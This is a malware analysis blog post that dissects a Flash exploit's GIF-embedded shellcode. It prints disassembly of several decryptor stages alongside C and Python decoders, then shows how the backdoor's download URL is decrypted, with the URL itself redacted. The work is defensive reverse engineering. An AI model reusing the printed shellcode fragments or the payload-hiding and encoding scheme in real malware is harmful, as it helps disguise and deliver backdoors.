As explained in the referenced links, the exploit found in the wild works as follows:
- The victim's browser loads a Flash file (cc.swf) that exploits the vulnerable Flash player
- The exploit (shellcode) then downloads a GIF file (logo.gif) from the web server hosting the SWF file
- This GIF file contains encrypted/encoded shellcode embedded within it that eventually downloads a backdoor executable from an encrypted URL within the file. Static decryption of this URL is what my friend was after
Unfortunately, many of the previous research writeups were not available at the time of my friend's request. To assist with Flash decompilation, I used SoThink SWF decompiler, a tool I cannot recommend enough and one that I have used to successfully analyze numerous Flash files. Since my effort, Zscaler has published a nice writeup on the Flash file and how it constructs its payload, although it misses a key part of writing the decoder -- how to determine where the encrypted shellcode starts within the downloaded GIF file.
Through analysis with SoThink's tool I was able to determine that the last four bytes of the GIF file contain a little endian integer giving the distance from the encrypted payload's first byte to the place where that integer is stored (the end of the file minus 4). The same integer is also the payload's length, so the payload occupies the bytes immediately before the final four. The following decompiled function shows this process. The decompilation is from SoThink and the comments are mine:
1 public class cc extends Sprite
2 {
3 [snip]
4 _loc_4 = new URLLoader();
5 _loc_4.dataFormat = "binary";
6 _loc_4.addEventListener("complete", Ƿ); // sets mpsc
7 _loc_4.load(new URLRequest("logo.gif")); // get logo.gif from same server as loaded
8 [snip]
9 }
10
11 public function Ƿ(event:Event) : void
12 {
13 var _loc_3:* = new ByteArray();
14
15 /* writes logo.gif to loc_3 */
16 _loc_3.writeBytes(event.target.data as ByteArray, 0, (event.target.data as ByteArray).length);
17
18 /* move to last 4 bytes */
19 _loc_3.position = _loc_3.length - 4;
20 _loc_3.endian = "littleEndian";
21
22 /* last four bytes of logo.gif */
23 var _loc_4:* = _loc_3.readUnsignedInt();
24 var _loc_2:* = new ByteArray();
25
26 /* length of file - integer from last 4 bytes - 4 */
27 _loc_2.writeBytes(_loc_3, _loc_3.length - 4 - _loc_4, _loc_4);
28 _loc_2.position = 0;
29
30 /* integer read from offset: length of file - integer from last 4 bytes - 4 */
31 Ǵ.setSharedProperty("mpsc", _loc_2);
32 Ǵ.start();
33
34 return;
35 }// end function
As can be seen on lines 4-7, which are inside the constructor of the Flash file, the logo.gif file is downloaded. The URLLoader instance used to download the file has its complete listener set to the function shown on lines 11 through 35. This function is triggered once the file has finished downloading. On line 16 the file's contents are copied into a byte array that the decompiler named _loc_3 (the third declared local variable). On lines 19 and 20 the array's position is moved to four bytes before the end of the file and its byte order is set to little endian. On line 23 the integer stored in these last four bytes is read into _loc_4, and on line 24 a new byte array, _loc_2, is declared. Line 27 is the key one: _loc_2 is filled with _loc_4 bytes of _loc_3 (logo.gif), starting at the end of the file minus the integer read minus another four bytes. At this point _loc_2 holds the encrypted shellcode, which is stored in the mpsc shared property. This buffer will later be executed by the exploit payload.
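The extraction logic from line 27 of the decompilation can be sketched in Python for static analysis. This is a minimal sketch rather than the code I actually used; the function name extract_payload is made up for illustration, and it assumes the whole GIF has already been read into memory.

```python
import struct


def extract_payload(gif_bytes: bytes) -> bytes:
    """Return the encrypted shellcode embedded at the end of logo.gif.

    Mirrors the ActionScript: the last four bytes hold a little endian
    integer N, and the payload is the N bytes immediately before them.
    (Hypothetical helper name; not taken from the exploit or any tool.)
    """
    if len(gif_bytes) < 4:
        raise ValueError("file too short to hold the 4-byte trailer")
    # Equivalent of readUnsignedInt() with endian = "littleEndian"
    (size,) = struct.unpack("<I", gif_bytes[-4:])
    start = len(gif_bytes) - 4 - size
    if start < 0:
        raise ValueError("trailer value is larger than the file")
    return gif_bytes[start:start + size]
```

For a real sample, the result could be written to disk (for example as stage1) and handed to ndisasm.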
Now that I knew how to find the shellcode reliably, I then needed to decrypt the shellcode in order to find the instructions that located and decrypted the embedded backdoor URL. When analyzing the shellcode I was working in a native Linux environment so I used a mix of vim, dd, and ndisasm. To start, I figured out the offset of the encrypted shellcode within my file and then extracted a copy of the shellcode.
The following lists the beginning of the shellcode:
1 $ ndisasm -b32 stage1
2 00000000 D9EE fldz
3 00000002 D97424F4 fnstenv [esp-0xc]
4 00000006 5E pop esi
5 00000007 83C61F add esi,byte +0x1f
6 0000000A 33C9 xor ecx,ecx
7 0000000C 66B90009 mov cx,0x900
8 00000010 8A06 mov al,[esi]
9 00000012 8A6601 mov ah,[esi+0x1]
10 00000015 8826 mov [esi],ah
11 00000017 884601 mov [esi+0x1],al
12 0000001A 83C602 add esi,byte +0x2
13 0000001D E2F1 loop 0x10
14 0000001F EE out dx,al
15 00000020 D974D9F4 fnstenv [ecx+ebx*8-0xc]
16 00000024 2483 and al,0x83
[snip]
For those of you who have never used ndisasm before, it is the disassembler that comes with the nasm assembler. The b option defines the architecture (16, 32, or 64 bit Intel), and ndisasm simply treats the file as raw instructions. This makes it very useful when analyzing shellcode. In the output the first column is the offset of the instruction from the beginning of the file, the second column is the instruction's opcodes, and the third column is the instruction's mnemonic.
As you can see in the ndisasm output, the instructions make sense until line 14 (offset 0x1f) where the out instruction is used. out is used to talk directly with hardware devices, and as such is a privileged operation. Since this shellcode runs in userland, out cannot be used, and even the operating system's kernel mode components use it sparingly. Examination of the instructions on lines 2 through 13 reveals a decryptor loop that targets the instructions starting at line 14. To begin, lines 2-4 leverage the floating point unit to determine the runtime address of where the fldz (offset 0) instruction is in memory: fnstenv saves the FPU environment, which includes the address of the last executed floating point instruction (fldz), onto the stack so that pop esi can retrieve it. The floating point internals that enable this are explained in a Symantec paper here and the shellcode trick was first disclosed by noir in 2003 here.
Lines 5-7 then set up the loop. First 0x1f is added to the esi register, which moves it to the offset where the out instruction is. ecx is then set to zero using xor and the value 0x900 is moved into the cx register (the bottom half of ecx). This is the loop counter, and since each iteration handles two bytes, the first layer of decryption operates on 0x900 (2304) byte pairs, or 0x1200 (4608) bytes. Lines 8 through 12 then implement the deobfuscation of the bytes beginning at line 14 (offset 0x1f) with an algorithm that translates to:
1 void stage1(unsigned char *buf)
2 {
3 unsigned char *esi;
4 int ecx;
5 unsigned char ah, al;
6
7 // add esi,byte +0x1f
8 esi = buf + 0x1f;
9
10 // xor ecx,ecx
11 // mov cx,0x900
12 ecx = 0x900;
13
14 while(ecx > 0)
15 {
16 // mov al,[esi]
17 al = *esi;
18
19 // mov ah,[esi+0x1]
20 ah = *(esi + 1);
21
22 // mov [esi],ah
23 *esi = ah;
24
25 // mov [esi+0x1],al
26 *(esi + 1) = al;
27
28 // add esi,byte +0x2
29 esi = esi + 2;
30
31 // loop 0x10
32 ecx = ecx - 1;
33 }
34 }
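For quick experimentation outside of C, the same byte swap can be sketched in Python. This is only an illustrative equivalent; the name swap_pairs and its defaults (offset 0x1f, 0x900 pairs, taken from the stage 1 listing) are my own choices, and the early exit on short input is an assumption added for safety.

```python
def swap_pairs(data: bytes, offset: int = 0x1F, pairs: int = 0x900) -> bytes:
    """Swap each pair of adjacent bytes, starting at `offset`.

    Python rendering of the stage 1 loop (hypothetical helper name).
    Bytes before `offset` and after the last pair are left untouched.
    """
    buf = bytearray(data)
    pos = offset
    for _ in range(pairs):
        if pos + 1 >= len(buf):
            break  # input shorter than the loop counter expects
        # mov al,[esi] / mov ah,[esi+1] / mov [esi],ah / mov [esi+1],al
        buf[pos], buf[pos + 1] = buf[pos + 1], buf[pos]
        pos += 2  # add esi,byte +0x2
    return bytes(buf)
```

As a sanity check, the first six bytes at offset 0x1f in the stage 1 listing are EE D9 74 D9 F4 24, and swap_pairs(bytes.fromhex("eed974d9f424"), offset=0, pairs=3) gives D9 EE D9 74 24 F4, which is the fldz / fnstenv pair that opens the next stage. Since the operation is a plain swap, running it twice restores the original bytes.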
As you can see from the converted assembly, the purpose of this loop is to swap each pair of adjacent bytes in the obfuscated shellcode. This is done by using the ah and al registers, which are 1 byte in size each. After running the decoder above, the instructions starting at our original out instruction (offset 0x1f) now make sense and become the second stage of shellcode decryption:
1 $ ndisasm -b32 stage2
2 00000000 D9EE fldz
3 00000002 D97424F4 fnstenv [esp-0xc]
4 00000006 5E pop esi
5 00000007 83C621 add esi,byte +0x21
6 0000000A 56 push esi
7 0000000B 5F pop edi
8 0000000C 33C9 xor ecx,ecx
9 0000000E 66B9F008 mov cx,0x8f0
10 00000012 90 nop
11 00000013 66AD lodsw
12 00000015 662D6161 sub ax,0x6161
13 00000019 C0E004 shl al,0x4
14 0000001C 02C4 add al,ah
15 0000001E AA stosb
16 0000001F E2F2 loop 0x13
17 00000021 6E outsb
18 00000022 6A6F push byte +0x6f
19 00000024 6F outsd
[snip]
As can be seen, this decryptor stage is another loop that transforms the code that follows it. Lines 2-4 contain code necessary to place esi at the fldz instruction of the second stage decryptor. Line 5 then adds 0x21 to esi in order to point it to the junk outsb instruction at line 17. The loop counter is initialized to 0x8f0 at line 9 and then lines 11 through 15 perform the transformation. This transformation can be expressed in C as:
1 void stage2(unsigned char *buf)
2 {
3 int ecx;
4 unsigned char *esi;
5 unsigned char *edi;
6 unsigned short ax;
7 unsigned char al, ah;
8
9 // add esi,byte +0x21
10 esi = buf + 0x21;
11
12 // push esi
13 // pop edi
14 edi = esi;
15
16 // xor ecx,ecx
17 // mov cx,0x8f0
18 ecx = 0x8f0;
19
20 while(ecx > 0)
21 {
22 // lodsw
23 ax = *(unsigned short *)esi;
24 esi = esi + 2;
25
26 // sub ax,0x6161
27 ax = ax - 0x6161;
28
29 ah = (ax >> 8) & 0xff;
30 al = ax & 0xff;
31
32 // shl al,0x4
33 al = al << 4;
34
35 // add al,ah
36 al = al + ah;
37
38 // stosb
39 *edi = al;
40 edi = edi + 1;
41
42 ecx = ecx - 1;
43 }
44 }
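Put differently, this stage appears to store every output byte as two input bytes, one per nibble, each biased by 0x61 (ASCII 'a'), with the high nibble first. A minimal Python sketch of the same transformation follows; decode_nibbles is a made-up name, the input is assumed to be already sliced to start at the encoded region (offset 0x21 of stage 2), and a trailing unpaired byte is simply ignored.

```python
def decode_nibbles(data: bytes) -> bytes:
    """Collapse each two-byte group into one byte, as the stage 2 loop does.

    Hypothetical helper: `data` is assumed to begin at the encoded region.
    """
    out = bytearray()
    for i in range(0, len(data) - 1, 2):
        # lodsw: little endian 16-bit load, then sub ax,0x6161
        ax = ((data[i] | (data[i + 1] << 8)) - 0x6161) & 0xFFFF
        al = ax & 0xFF
        ah = (ax >> 8) & 0xFF
        al = (al << 4) & 0xFF  # shl al,0x4
        al = (al + ah) & 0xFF  # add al,ah
        out.append(al)         # stosb
    return bytes(out)
```

The first four encoded bytes in the stage 2 listing are 6E 6A 6F 6F ("njoo"), and decode_nibbles(b"njoo") returns D9 EE, the fldz instruction that begins the next stage.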
After the second stage of deobfuscation the outsb (line 17 from the previous ndisasm output) and its following instructions look like:
1 $ ndisasm -b32 stage3
2 00000000 D9EE fldz
3 00000002 D97424F4 fnstenv [esp-0xc]
4 00000006 5E pop esi
5 00000007 83C61F add esi,byte +0x1f
6 0000000A 33C9 xor ecx,ecx
7 0000000C 66B96804 mov cx,0x468
8 00000010 8A06 mov al,[esi]
9 00000012 8A6601 mov ah,[esi+0x1]
10 00000015 8826 mov [esi],ah
11 00000017 884601 mov [esi+0x1],al
12 0000001A 83C602 add esi,byte +0x2
13 0000001D E2F1 loop 0x10
14 0000001F EE out dx,al
15 00000020 D974D9F4 fnstenv [ecx+ebx*8-0xc]
16 00000024 2483 and al,0x83
[snip]
You may notice that this is the same algorithm used in stage 1 for decryption, just with a different loop counter since the decrypting process is moving further down the file. By running the algorithm starting at line 14 (offset 0x1f) we get the fourth level of decryptor shellcode:
1 $ ndisasm -b32 stage4
2 00000000 D9EE fldz
3 00000002 D97424F4 fnstenv [esp-0xc]
4 00000006 5E pop esi
5 00000007 83C616 add esi,byte +0x16
6 0000000A 33C9 xor ecx,ecx
7 0000000C 66B9BB08 mov cx,0x8bb
8 00000010 803631 xor byte [esi],0x31
9 00000013 46 inc esi
10 00000014 E2FA loop 0x10
[snip]
This decryptor loop decrypts the next 0x8bb bytes using the following algorithm:
1 void stage4(unsigned char *buf)
2 {
3 int ecx;
4 unsigned char *esi;
5
6 // add esi,byte +0x16
7 esi = buf + 0x16;
8
9 // xor ecx,ecx
10 // mov cx,0x8bb
11 ecx = 0x8bb;
12
13 while (ecx > 0)
14 {
15 // xor byte [esi],0x31
16 *esi = *esi ^ 0x31;
17
18 // inc esi
19 esi = esi + 1;
20
21 // loop 0x10
22 ecx = ecx - 1;
23 }
24 }
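The final layer is a single-byte XOR, which is short enough to sketch in Python as well. The name xor_layer and its defaults (offset 0x16, 0x8bb bytes, key 0x31, all read off the stage 4 listing) are illustrative assumptions, not part of any existing tool.

```python
def xor_layer(data: bytes, offset: int = 0x16, count: int = 0x8BB,
              key: int = 0x31) -> bytes:
    """XOR `count` bytes starting at `offset` with `key`.

    Python rendering of the stage 4 loop (hypothetical helper name).
    Stops at the end of the buffer if the input is shorter than expected.
    """
    buf = bytearray(data)
    end = min(offset + count, len(buf))
    for i in range(offset, end):
        buf[i] ^= key  # xor byte [esi],0x31 / inc esi
    return bytes(buf)
```

For instance, xor_layer(bytes.fromhex("64badd"), offset=0, count=3) yields 55 8B EC, the bytes of a standard push ebp / mov ebp,esp function prologue.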
After running this algorithm, we finally get to the fully deobfuscated shellcode and can begin analysis:
1 $ ndisasm -b32 stage5
2 00000000 55 push ebp
3 00000001 8BEC mov ebp,esp
4 00000003 81EC90010000 sub esp,0x190
5 00000009 53 push ebx
6 0000000A 56 push esi
7 0000000B 57 push edi
[snip]
Remember that the original purpose of my friend's request was a decoder that could decrypt the encrypted URL used to download the backdoor file. The first relevant instruction that I found related to this task is at offset 0x90 in the deobfuscated function:
1 00000090 E800000000 call dword 0x95
2 00000095 5B pop ebx
3 00000096 83C350 add ebx,byte +0x50
4 00000099 899D74FEFFFF mov [ebp-0x18c],ebx
5 0000009F 8B8574FEFFFF mov eax,[ebp-0x18c]
6 000000A5 813831123112 cmp dword [eax],0x12311231
7 000000AB 740F jz 0xbc
8 000000AD 8B8574FEFFFF mov eax,[ebp-0x18c]
9 000000B3 40 inc eax
10 000000B4 898574FEFFFF mov [ebp-0x18c],eax
11 000000BA EBE3 jmp short 0x9f
[snip]
On line 1 we see a call instruction being made to the next instruction (pop ebx). This has the effect of placing the runtime address of the pop ebx instruction into ebx. 0x50 is then added to this address and a loop begins that searches, one byte at a time, for the dword 0x12311231 (stored on disk as the bytes 31 12 31 12 due to little endian) towards the end of the GIF file. This is the special marker used to denote where the encrypted URL begins. Once this marker is found, control is transferred to offset 0xbc (this check and jump occur on lines 6-7).
Starting at offset 0xbc, we have the following loop. Note that this disassembly is annoyingly long due to no optimizations being used.
1 000000BC 8B8574FEFFFF mov eax,[ebp-0x18c]
2 000000C2 83C004 add eax,byte +0x4
3 000000C5 898574FEFFFF mov [ebp-0x18c],eax
4 000000CB 8B8574FEFFFF mov eax,[ebp-0x18c]
5 000000D1 898580FEFFFF mov [ebp-0x180],eax
6 000000D7 83A588FEFFFF00 and dword [ebp-0x178],byte +0x0
7 000000DE 8B8574FEFFFF mov eax,[ebp-0x18c]
8 000000E4 038588FEFFFF add eax,[ebp-0x178]
9 000000EA 0FBE00 movsx eax,byte [eax]
10 000000ED 83F8FF cmp eax,byte -0x1
11 000000F0 744F jz 0x141
12 000000F2 8B8574FEFFFF mov eax,[ebp-0x18c]
13 000000F8 038588FEFFFF add eax,[ebp-0x178]
14 000000FE 0FBE00 movsx eax,byte [eax]
15 00000101 83F012 xor eax,byte +0x12
16 00000104 8B8D74FEFFFF mov ecx,[ebp-0x18c]
17 0000010A 038D88FEFFFF add ecx,[ebp-0x178]
18 00000110 8801 mov [ecx],al
19 00000112 8B8574FEFFFF mov eax,[ebp-0x18c]
20 00000118 038588FEFFFF add eax,[ebp-0x178]
21 0000011E 0FBE00 movsx eax,byte [eax]
22 00000121 83E831 sub eax,byte +0x31
23 00000124 8B8D74FEFFFF mov ecx,[ebp-0x18c]
24 0000012A 038D88FEFFFF add ecx,[ebp-0x178]
25 00000130 8801 mov [ecx],al
26 00000132 8B8588FEFFFF mov eax,[ebp-0x178]
27 00000138 40 inc eax
28 00000139 898588FEFFFF mov [ebp-0x178],eax
29 0000013F EB9D jmp short 0xde
On lines 1-3 the pointer to where the marker was found is incremented by 4 to skip the marker and then placed back into [ebp-0x18c]. This value is then also placed into [ebp-0x180] on line 5, and line 6 zeroes the index kept in [ebp-0x178]. The buffer holding the URL is then enumerated until a 0xff byte is found. This is accomplished by the byte comparison against -0x1 on line 10 and the bailout if found on line 11. Lines 12 through 29 perform the decryption of the URL. The main part of this decryption is on lines 15 and 22, where each byte is transformed by XOR'ing with 0x12 and then subtracting 0x31.
After this analysis, we now finally know how to find and decrypt the URL:
- Read in logo.gif
- Search the file for the byte sequence 31 12 31 12 (the dword 0x12311231 in little endian)
- Once found, skip the four marker bytes and decrypt each following byte by XORing it with 0x12 and then subtracting 0x31
- Stop processing when a byte of 0xff is found
$ python decode.py logo.gif
Found \x31\x12\x31\x12 marker at offset 17764
Found 0xff, breaking URL processing loop
Download URL: http://redacted/redacted.exe
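The decode.py script itself is not reproduced here, but the steps listed above can be sketched in a few lines of Python. This is a minimal sketch under some assumptions: decode_url is a made-up name, the first occurrence of the marker in the file is taken to be the right one (the shellcode actually starts searching from inside itself), and the decrypted bytes are decoded as Latin-1 so that unexpected values do not raise.

```python
MARKER = b"\x31\x12\x31\x12"  # dword 0x12311231 as stored on disk


def decode_url(data: bytes) -> str:
    """Locate the marker and decrypt the URL that follows it.

    Hypothetical helper illustrating the steps above; assumes the first
    marker hit in `data` is the one the shellcode would find.
    """
    pos = data.find(MARKER)
    if pos < 0:
        raise ValueError("marker 31 12 31 12 not found")
    out = bytearray()
    for b in data[pos + len(MARKER):]:
        if b == 0xFF:  # terminator is checked on the raw (encrypted) byte
            break
        out.append(((b ^ 0x12) - 0x31) & 0xFF)  # xor 0x12, then sub 0x31
    return out.decode("latin-1")
```

A caller would read logo.gif in binary mode and pass its contents in, for example decode_url(open("logo.gif", "rb").read()).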
I hope that you found this blog post informative and interesting. I would like to thank the other members of the Volatility Team (@iMHLv2, @gleeda, @4tphi) for proofreading this before I hit 'Publish' and @justdionysus for providing the historical references related to the use of the FPU for finding EIP. If you have any questions or comments on the post please leave a comment below, ping me on Twitter (@attrc), or shoot me an email (andrew @@@ memoryanalysis.net).